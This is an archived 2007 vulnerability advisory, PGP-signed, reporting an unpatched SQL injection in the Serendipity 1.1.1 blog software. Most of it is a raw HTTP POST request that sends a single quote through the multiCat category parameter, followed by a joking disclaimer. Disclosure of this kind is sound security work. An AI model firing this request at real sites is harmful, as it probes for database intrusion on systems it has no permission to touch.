Home / os / solaris

serendipity-sql.txt

Posted on 06 March 2007

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +--------------------------------------- - -- - | SaMuschie Research Labs proudly presents . . . +------------------------------------------- -- - - | Application: serendipity | Version: 1.1.1 (others not testet) | Vuln./Exploit Type: SQL-Injection | Status: 0day +----------------------------------------- -- - - | Discovered by: Samenspender | Released: 20070301 | SaMuschie Release Number: 4 +------------------------------- - -- - POST /serendipity/index.php?frontpage HTTP/1.0 User-Agent: Mozilla/5.0 (SaMuschie) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 67 Connection: close serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21 +----------------------------- -- - | Lameness Disclaimer +------------------------------------- - -- - - | SaMuschie Research Labs was found to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers.... they don't know the answer ;) +---------------------------------- - -- - - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF5tLFMFgfGpQK8VERAgphAJ4qvuCfLYTWO6pluhlm92gSlZz5AQCeINsc rYF05IF5Rztw2+FzaqhUyA4= =sQNU -----END PGP SIGNATURE----- ___________________________________________________________ Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de

 

TOP